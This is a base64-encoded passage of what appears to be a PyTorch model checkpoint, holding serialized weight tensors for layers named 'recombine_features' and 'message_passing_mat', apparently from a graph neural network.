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IwcQFhLhAnAAAAAAAAAAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8t
X4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4l
PLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV
+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+